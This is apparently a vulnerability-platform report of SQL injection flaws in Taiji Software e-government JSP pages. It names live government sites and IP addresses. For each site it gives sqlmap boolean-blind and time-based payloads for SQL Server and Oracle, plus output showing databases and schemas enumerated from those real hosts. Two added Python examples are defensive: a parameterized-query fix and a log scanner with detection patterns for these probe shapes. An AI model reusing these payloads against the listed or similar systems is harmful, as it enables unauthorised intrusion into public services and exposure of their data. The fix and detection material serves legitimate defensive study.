### Brief description:
A late-night submission
### Detailed description:
Shenzhen Taiji Software Co., Ltd. provides a dedicated e-government service system that is in use by a large number of users. No need to say more about that.
Injection point:
```
http://www.gzegn.gov.cn:8080/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC
```
The zzjgdm parameter is injectable. Taking the Guizhou provincial e-government site as the example, only the tables were enumerated; nothing else was tested.
payload:
```
Place: GET
Parameter: zzjgdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: zzjgdm=009390359' AND 4047=4047 AND 'ZDFM'='ZDFM&depName=%CA%A1%C3%F1%D5%FE%CC%FC
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: zzjgdm=009390359' AND 3874=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mJmn'='mJmn&depName=%CA%A1%C3%F1%D5%FE%CC%FC
```
![太极软件.png](https://images.seebug.org/upload/201504/150336083ea8abe6ec12d85d3679afebeecd7fa1.png)
```
http://www.cqspbxz.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009290753&depName=%C7%F8%B7%BF%B9%DC%BE%D6
```
```
Parameter: zzjgdm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: zzjgdm=009290753' AND 2319=2319 AND 'ZTze'='ZTze&depName=%C7%F8%B7%BF%B9%DC%BE%D6
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: zzjgdm=009290753' AND 9798=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Uvqz'='Uvqz&depName=%C7%F8%B7%BF%B9%DC%BE%D6
---
[10:06:26] [INFO] testing Microsoft SQL Server
[10:06:26] [INFO] confirming Microsoft SQL Server
[10:06:28] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[10:06:28] [INFO] fetching database names
[10:06:28] [INFO] fetching number of databases
[10:06:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:06:28] [INFO] retrieved: 21
```
![太极软件1.png](https://images.seebug.org/upload/201504/1512303796f50620dfdef3f72ca895d30a021564.png)
```
http://www.ddkspdt.com/application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009286236&depName=%C7%F8%D6%CA%BC%E0%BE%D6
```
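The sqlmap output above shows the classic symptom of a parameter spliced directly into SQL text: a quote in `zzjgdm` ends the literal and the rest of the input runs as part of the query. The block below is an added example, not code from the report or from Taiji Software; it uses Python with an in-memory SQLite table (constructed rows, hypothetical `departments` schema) to stand in for the JSP/SQL Server page, and contrasts the string-built query with a bound-parameter version using the report's own boolean probe as input.

```python
"""String-built query beside its parameterized form (added example).
SQLite stands in for the report's JSP page on SQL Server; the table,
rows and schema are constructed for illustration."""
import sqlite3


def make_db():
    """Constructed sample data: two organization codes from the report."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE departments (zzjgdm TEXT, name TEXT)")
    con.executemany(
        "INSERT INTO departments VALUES (?, ?)",
        [("009390359", "dept-A"), ("009290753", "dept-B")],
    )
    return con


def show_departments_vulnerable(con, zzjgdm):
    """The pattern the sqlmap findings imply: user input concatenated into SQL.

    A quote in the input closes the literal, so `' AND 4047=4047 AND 'x'='x`
    becomes part of the WHERE clause and the response depends on whether the
    injected condition is true. That observable difference is exactly what
    boolean-based blind injection relies on."""
    sql = "SELECT name FROM departments WHERE zzjgdm = '" + zzjgdm + "'"
    return [row[0] for row in con.execute(sql)]


def show_departments_fixed(con, zzjgdm):
    """Bound parameter: the whole input is compared as data, never parsed as SQL.

    The same probe string now simply fails to match any organization code."""
    sql = "SELECT name FROM departments WHERE zzjgdm = ?"
    return [row[0] for row in con.execute(sql, (zzjgdm,))]


if __name__ == "__main__":
    db = make_db()
    probe_true = "009390359' AND 4047=4047 AND 'ZDFM'='ZDFM"   # from the report
    probe_false = "009390359' AND 4047=4048 AND 'ZDFM'='ZDFM"  # same shape, false
    print("vulnerable, true condition :", show_departments_vulnerable(db, probe_true))
    print("vulnerable, false condition:", show_departments_vulnerable(db, probe_false))
    print("fixed, probe               :", show_departments_fixed(db, probe_true))
    print("fixed, real code           :", show_departments_fixed(db, "009390359"))
```

With the concatenated query the true and false probes return different result sets, which is the signal sqlmap's boolean-based blind technique keys on; with the bound parameter both probes return nothing and only a genuine code matches. In the JSP code the equivalent change is moving from `Statement` with string concatenation to `PreparedStatement` with `setString`, for every one of the parameters listed in this report (`zzjgdm`, `ID`, `xiangmuDW`, `queryid`, `bjbh`).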
#2:
/showZXInfo.jsp?ID= is injectable
```
http://www.cqszzw.gov.cn/application/gzhd/zxzx/showZXInfo.jsp?ID=20111219175109007
```
payload:
```
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=20111219175109007' AND 4863=4863 AND 'hsAz'='hsAz
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: ID=20111219175109007' AND 4007=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'VBTD'='VBTD
---
[00:47:43] [INFO] testing Microsoft SQL Server
[00:47:43] [INFO] confirming Microsoft SQL Server
[00:47:45] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[00:47:45] [INFO] fetching database names
[00:47:45] [INFO] fetching number of databases
[00:47:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:47:45] [INFO] retrieved: 5
[00:47:47] [INFO] retrieved: master
[00:48:03] [INFO] retrieved: model
[00:48:17] [INFO] retrieved: msdb
[00:48:30] [INFO] retrieved: tempdb
[00:48:47] [INFO] retrieved: web_shizhu
```
![太极软件2.png](https://images.seebug.org/upload/201504/151235443f2bccdf54b32c4ad73f8cb51cdd0326.png)
#3:
In the file /zwugk.jsp, multiple parameters are injectable: zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2
```
http://61.183.35.105/application/wsbs/zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2
```
```
Place: GET
Parameter: xiangmuDW
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 3105=3105 AND '%'='&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: selectpageno=95&shouliId=&xiangmuDW=%' AND 2511=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(103)||CHR(115),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2
---
[12:56:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:56:54] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[12:56:54] [INFO] fetching database (schema) names
[12:56:54] [INFO] fetching number of databases
[12:56:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:56:54] [INFO] retrieved: 19
[12:57:35] [INFO] retrieved: CTXSYS
[13:00:49] [INFO] retrieved: DBSNMP
```
![太极软件3.png](https://images.seebug.org/upload/201504/151308178b9543d4a6475ac2021e8ea5ab849b90.png)
```
http://www.cqszzw.gov.cn/application/wsbs/zwugk.jsp?queryid=111
```
```
Place: GET
Parameter: queryid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: queryid=111%' AND 1542=1542 AND '%'='
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: queryid=111%' AND 3688=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
---
[12:41:26] [INFO] testing Microsoft SQL Server
[12:41:30] [INFO] confirming Microsoft SQL Server
[12:41:34] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[12:41:34] [INFO] fetching database names
[12:41:34] [INFO] fetching number of databases
[12:41:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:41:34] [INFO] retrieved: 5
[12:41:45] [INFO] retrieved: master
[12:43:10] [INFO] retrieved: model
[12:44:11] [INFO] retrieved: msdb
[12:45:10] [INFO] retrieved: tempdb
[12:46:22] [INFO] retrieved: web_shizhu
```
![太极软件4.png](https://images.seebug.org/upload/201504/151311293635691b7b4738f7a8345fc14b9eafb9.png)
```
http://www.xazwfw.com/application/wsbs/zwugk.jsp?selectpageno=16&shouliId=&xiangmuDW=&button=%E6%9F%A5%E8%AF%A2
```
```
---
Place: GET
Parameter: xiangmuDW
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 4085=4085 AND '%'='&button=%E6%9F%A5%E8%AF%A2
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: selectpageno=16&shouliId=&xiangmuDW=%' AND 1823=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(106)||CHR(100)||CHR(122),5) AND '%'='&button=%E6%9F%A5%E8%AF%A2
---
[02:23:57] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:23:57] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[02:23:57] [INFO] fetching database (schema) names
[02:23:57] [INFO] fetching number of databases
[02:23:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:23:57] [INFO] retrieved: 18
[02:24:26] [INFO] retrieved: CTXSYS
[02:26:44] [INFO] retrieved: DBSNMP
[02:29:00] [INFO] retrieved: DMSYS
[02:30:52] [INFO] retrieved: DZJC
[02:32:26] [INFO] retrieved: DZJC_XIANAN_HB
[02:36:45] [INFO] retrieved: EXFSYS
[02:38:53] [INFO] retrieved: MDSYS
[02:40:44] [INFO] retrieved: OLAPSYS
[02:43:03] [INFO] retrieved: ORDSYS
[02:45:17] [INFO] retrieved: OUTLN
[02:47:31] [INFO] retrieved: SCOTT
[02:49:16] [INFO] retrieved: SYS
[02:50:20] [INFO] retrieved: SYSMAN
[02:52:11] [INFO] retrieved: SYSTEM
[02:54:16] [INFO] retrieved: TSMSYS
[02:56:24] [INFO] retrieved: WMSYS
[02:58:21] [INFO] retrieved: WZ_XIANAN_HB
[03:02:26] [INFO] retrieved: XDB
available databases [18]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] DZJC
[*] DZJC_XIANAN_HB
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] WZ_XIANAN_HB
[*] XDB
[03:03:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.xazwfw.com'
```
![太极软件5.png](https://images.seebug.org/upload/201504/15131434445b012e585ed0fbd26b0aeb820506be.png)
#4:
resultsp.jsp?bjbh= is injectable
```
http://222.86.58.9:8088/application/jsp/resultsp.jsp?bjbh=
```
```
Place: GET
Parameter: bjbh
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: bjbh=111' AND 3031=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(79)||CHR(67)||CHR(87),5) AND 'jxlx'='jxlx
---
[13:22:25] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or 2000
web application technology: Servlet 2.4, JSP, JSP 2.0
back-end DBMS: Oracle
[13:22:25] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[13:22:25] [INFO] fetching database (schema) names
[13:22:25] [INFO] fetching number of databases
[13:22:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[13:22:41] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[13:22:44] [INFO] adjusting time delay to 1 second due to good response times
[13:22:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:22:45] [ERROR] unable to retrieve the number of databases
[13:22:45] [INFO] falling back to current database
[13:22:45] [INFO] fetching current database
[13:22:45] [INFO] resumed: GUIZHOU_DZJC
[13:22:45] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[13:22:45] [INFO] fetching tables for database: 'GUIZHOU_DZJC'
[13:22:45] [INFO] fetching number of tables for database 'GUIZHOU_DZJC'
[13:22:45] [INFO] retrieved: 10
[13:22:58] [ERROR] invalid character detected. retrying..
[13:22:58] [WARNING] increasing time delay to 2 seconds
9
[13:23:07] [INFO] retrieved: T_JC_XZ
```
![太极软件6.png](https://images.seebug.org/upload/201504/15132622b8e56ea7fba3db9006daecca8770906b.png)
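Every finding in this report (#1 through #4) was confirmed with the same three sqlmap probe shapes: a boolean tautology that closes and re-opens a quoted literal, the SQL Server/Sybase "heavy query" self-join of `sysusers`, and the Oracle `DBMS_PIPE.RECEIVE_MESSAGE` delay. Those shapes are easy to pick out of web-server access logs after the fact. The block below is an added example, not code from the report or from Taiji Software: a small Python scanner over Common Log Format lines that URL-decodes each query parameter, matches it against those three signatures, and marks whether the hit lands on an endpoint/parameter pair this report lists. The log lines are constructed to mirror the report's payloads (documentation IP range, shortened `sysusers` join); they are not captured traffic.

```python
"""Access-log detection for the blind SQL injection probe shapes in this report.
Added example; the log lines below are constructed, not real traffic."""
import re
from urllib.parse import unquote_plus

# Payload families visible in the report's sqlmap output.
SIGNATURES = {
    # closes a quoted literal, asserts n=n, re-opens a literal (boolean-based blind)
    "boolean-blind-tautology": re.compile(
        r"'\s*AND\s+(\d+)=\1\s+AND\s+'[^']*'\s*=\s*'", re.IGNORECASE),
    # SQL Server/Sybase "heavy query": cross-join of sysusers used as a delay
    "mssql-heavy-query": re.compile(
        r"SELECT\s+COUNT\(\*\)\s+FROM\s+sysusers\s+AS\s+sys1\s*,\s*sysusers", re.IGNORECASE),
    # Oracle time-based probe via DBMS_PIPE.RECEIVE_MESSAGE(..., seconds)
    "oracle-dbms-pipe-delay": re.compile(
        r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.IGNORECASE),
}

# Endpoint/parameter pairs the report lists as injectable.
REPORTED_PARAMS = {
    "/application/gzhd/bgxz/showdepartments.jsp": {"zzjgdm"},
    "/application/gzhd/zxzx/showZXInfo.jsp": {"ID"},
    "/application/wsbs/zwugk.jsp": {"xiangmuDW", "queryid"},
    "/application/jsp/resultsp.jsp": {"bjbh"},
}

# Common Log Format; the request target stays URL-encoded as the server wrote it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def split_target(target):
    """Split a request target into its path and decoded {param: [values]}."""
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        # unquote_plus substitutes U+FFFD for bytes that are not UTF-8 (the
        # GBK-encoded depName values in the report), so decoding never raises.
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return path, params


def classify_line(line):
    """Return one finding per (parameter, signature) match in a single log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, params = split_target(m.group("target"))
    findings = []
    for param, values in params.items():
        for value in values:
            for name, rx in SIGNATURES.items():
                if rx.search(value):
                    findings.append({
                        "ip": m.group("ip"),
                        "path": path,
                        "param": param,
                        "signature": name,
                        "known_vulnerable": param in REPORTED_PARAMS.get(path, set()),
                    })
    return findings


def scan(lines):
    """Run classify_line over an iterable of log lines."""
    return [f for line in lines for f in classify_line(line)]


# Constructed sample log: one benign request, then the three probe shapes
# from the report, URL-encoded the way a server logs them.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Apr/2015:10:06:20 +0800] "GET /application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359&depName=%CA%A1%C3%F1%D5%FE%CC%FC HTTP/1.1" 200 2311',
    '203.0.113.7 - - [15/Apr/2015:10:06:26 +0800] "GET /application/gzhd/bgxz/showdepartments.jsp?zzjgdm=009390359%27%20AND%204047%3D4047%20AND%20%27ZDFM%27%3D%27ZDFM&depName=%CA%A1%C3%F1%D5%FE%CC%FC HTTP/1.1" 200 2311',
    '203.0.113.7 - - [15/Apr/2015:00:47:45 +0800] "GET /application/gzhd/zxzx/showZXInfo.jsp?ID=20111219175109007%27%20AND%204007%3D(SELECT%20COUNT(*)%20FROM%20sysusers%20AS%20sys1,sysusers%20AS%20sys2,sysusers%20AS%20sys3)%20AND%20%27VBTD%27%3D%27VBTD HTTP/1.1" 200 1870',
    '203.0.113.7 - - [15/Apr/2015:12:56:54 +0800] "GET /application/wsbs/zwugk.jsp?selectpageno=95&shouliId=&xiangmuDW=%25%27%20AND%202511%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(68)%7C%7CCHR(90),5)%20AND%20%27%25%27%3D%27&button=%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 5102',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The benign first line produces no finding; the other three each yield exactly one, on `zzjgdm`, `ID` and `xiangmuDW` respectively, all flagged as known-vulnerable. Decoding before matching matters: in the raw log the quote is `%27` and the `%'` prefix used against the `LIKE`-style `xiangmuDW` filter is `%25%27`, so a signature applied to the undecoded line would miss them. The single-thread sqlmap runs in the report also mean a long burst of requests from one address against one parameter, which is a useful secondary signal even where the payload text is not captured.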
### Proof of vulnerability:
Identical to the detailed description above.